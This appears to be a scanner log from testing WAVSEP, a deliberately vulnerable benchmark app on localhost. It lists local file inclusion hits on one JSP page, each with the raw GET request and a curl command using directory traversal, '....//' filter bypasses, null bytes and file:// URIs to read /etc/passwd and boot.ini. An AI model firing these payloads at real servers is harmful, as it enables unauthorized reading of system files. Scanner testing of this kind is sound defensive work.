Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
